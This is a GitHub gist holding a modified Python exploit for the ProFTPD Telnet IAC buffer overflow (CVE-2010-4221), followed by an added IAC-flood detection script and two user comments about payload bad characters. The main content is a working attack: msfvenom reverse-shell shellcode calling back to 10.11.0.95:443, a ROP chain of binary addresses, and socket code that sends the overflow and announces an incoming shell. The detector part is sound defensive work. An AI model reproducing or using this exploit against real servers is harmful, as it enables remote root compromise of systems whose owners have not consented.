@AfroThundr3007730
Last active October 25, 2019 08:16
Modified version of the CVE-2010-4221 Python script found here: https://github.com/Muhammd/ProFTPD-1.3.3a/blob/master/ProFTPD_exploit.py
```python
#!/usr/bin/env python
#
###################################################################################################
#
# Vulnerability:          ProFTPD IAC Remote Root Exploit
#                         Telnet IAC Buffer Overflow (Linux), ProFTPD 1.3.2rc3
#                         This is a part of the Metasploit Module
#                         exploit/linux/ftp/proftp_telnet_iac
# Vulnerable Application: ProFTPD 1.3.3a
# Tested on:              Linux 2.6.32-5-686
#
# Author:  Muhammad Haidari
# Contact: ghmh@outlook.com
# Website: www.github.com/muhammd
#
# Spawns a reverse shell to 10.11.0.95:443
#
###################################################################################################
#
# Usage: python ProFTPD_exploit.py <Remote IP Address>
#
# Written for Python 2: payload, buf and the struct.pack output are all byte strings (str).
import sys
import socket
import struct

# msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.95 LPORT=443 EXITFUNC=thread \
#   PrependChrootBreak=true --smallest -f python -b '\x09\x0a\x0b\x0c\x0d\x20\xff'
payload = (
    '\x6a\x1d\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x77\x29\x9a'
    '\x30\x83\xeb\xfc\xe2\xf4\x46\xe0\xab\xeb\x1d\x6f\xc2\xfd\xf7\x43'
    '\xa7\xb9\x94\x43\xbd\x68\xba\xa9\x13\xe9\x2f\xe4\x1a\x01\xb7\x79'
    '\xfc\x58\x59\x07\x13\xd3\x1d\x14\xc3\x80\x7b\xe4\x1a\xd2\x8d\x43'
    '\xa7\xb9\xae\x71\x57\xb0\x46\xf2\x6d\xd3\x24\x6a\xc9\x5a\x75\xa0'
    '\x7b\x80\x11\xe4\x1a\xa3\x2e\x99\xa5\xfd\xf7\x60\xe3\xc9\x1f\x23'
    '\x91\x30\x28\x41\x98\x30\x76\x92\x13\xd1\xc7\x4f\xca\x61\x24\x9a'
    '\x99\xb9\x96\xe4\x1a\x62\x1f\x47\xb5\x43\x1f\x41\xb5\x1f\x15\x40'
    '\x13\xd3\x25\x7a\x13\xd1\xc7\x22\x57\xb0'
)

# NOTE: All addresses are from the proftpd binary
IACCount = 4096 + 16
Offset = 0x102c - 4
Ret = '0x805a547'       # pop esi / pop ebp / ret (informational; the packed value is used below)
Writable = '0x80e81a0'  # .data (informational; the packed value is used below)

if len(sys.argv) < 2:
    print('\nUsage: %s <HOST>\n' % (sys.argv[0]))
    sys.exit()

rop = struct.pack('<L', 0xcccccccc)   # unused
# mov eax,esi / pop ebx / pop esi / pop ebp / ret
rop += struct.pack('<L', 0x805a544)
rop += struct.pack('<L', 0xcccccccc)  # becomes ebx
rop += struct.pack('<L', 0xcccccccc)  # becomes esi
rop += struct.pack('<L', 0xcccccccc)  # becomes ebp
# quadruple deref the res pointer :)
for _ in range(4):
    rop += struct.pack('<L', 0x8068886)  # mov eax,[eax] / ret
# skip the pool chunk header
for _ in range(16):
    rop += struct.pack('<L', 0x805bd8e)  # inc eax / adc cl, cl / ret
# execute the data :)
rop += struct.pack('<L', 0x0805c26c)  # jmp eax

buf = 'SITE '
buf += payload
if len(buf) % 2 == 0:
    buf += 'B'
    print('Buffer was aligned')
buf += '\xff' * (IACCount - len(payload))
buf += '\x90' * (Offset - len(buf))
addrs = struct.pack('<L', 0x805a547)   # Ret
addrs += struct.pack('<L', 0x80e81a0)  # Writable
addrs += rop
buf += addrs
buf += '\r\n'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 21))
s.recv(1024)
s.send(buf)
print('Payload Successfully Send...Check your Multi/Handler')
print('....Reverse shell is comming to you...')
print(s.recv(1024))
s.close()
```
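A defender-side check, added here as an example and not part of the gist or the original script: it splits a captured client-to-server FTP control stream on CRLF and flags command lines whose count or run length of Telnet IAC (0xFF) bytes, or whose total length, is abnormal, which is the shape of the buffer the script above builds. The function names, thresholds and sample traffic are constructed assumptions, not values from any real client or sensor.

```python
# Added detection heuristic (not from the gist). Names, thresholds and the sample
# traffic below are constructed assumptions, not project or sensor values.
IAC = 0xFF               # Telnet "Interpret As Command" byte
MAX_IAC_PER_LINE = 32    # assumption: real clients send at most a few IACs per command
MAX_IAC_RUN = 2          # "IAC IAC" is a legitimate escaped 0xFF; longer runs are not
MAX_LINE_LEN = 512       # assumption: ordinary FTP command lines are far shorter

def iac_stats(line):
    """Return (iac_count, longest_iac_run) for one FTP command line given as bytes."""
    count = longest = run = 0
    for b in line:
        if b == IAC:
            count += 1
            run += 1
            longest = max(longest, run)
        else:
            run = 0
    return count, longest

def classify_command(line):
    """Return the reasons a command line looks like an IAC overflow attempt ([] if clean)."""
    reasons = []
    count, longest = iac_stats(line)
    if count > MAX_IAC_PER_LINE:
        reasons.append("iac_count=%d" % count)
    if longest > MAX_IAC_RUN:
        reasons.append("iac_run=%d" % longest)
    if len(line) > MAX_LINE_LEN:
        reasons.append("line_len=%d" % len(line))
    return reasons

def scan_stream(data):
    """Split a client->server FTP control stream on CRLF; return (line_no, verb, reasons) hits."""
    findings = []
    for idx, line in enumerate(data.split(b"\r\n")):
        reasons = classify_command(line) if line else []
        if reasons:
            verb = line.split(b" ", 1)[0].decode("ascii", "replace")
            findings.append((idx, verb, reasons))
    return findings

# Constructed sample traffic: a normal session and one carrying a 4112-byte IAC run.
BENIGN = b"USER anonymous\r\nPASS guest@\r\nSITE HELP\r\n"
SUSPICIOUS = b"USER anonymous\r\nSITE " + b"\xff" * 4112 + b"\x90" * 100 + b"\r\n"

if __name__ == "__main__":
    print("benign:", scan_stream(BENIGN))
    print("suspicious:", scan_stream(SUSPICIOUS))
```

The thresholds are deliberately loose: a single escaped 0xFF (IAC IAC) in a filename stays clean, while the thousands-long run the overflow needs is flagged on three independent counts.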
@Skwerl23
Skwerl23 commented Oct 1, 2019

Bad characters xff and x0d kept breaking my creation.
Either I got lucky when I removed them (they aren't in Metasploit code) OR they don't matter.
Try removing them, or remaking the payload until it succeeds.

@AfroThundr3007730
Author

Hmm, IIRC, I didn't have any issues with the current badchars, but it was a while ago. YMMV, I guess.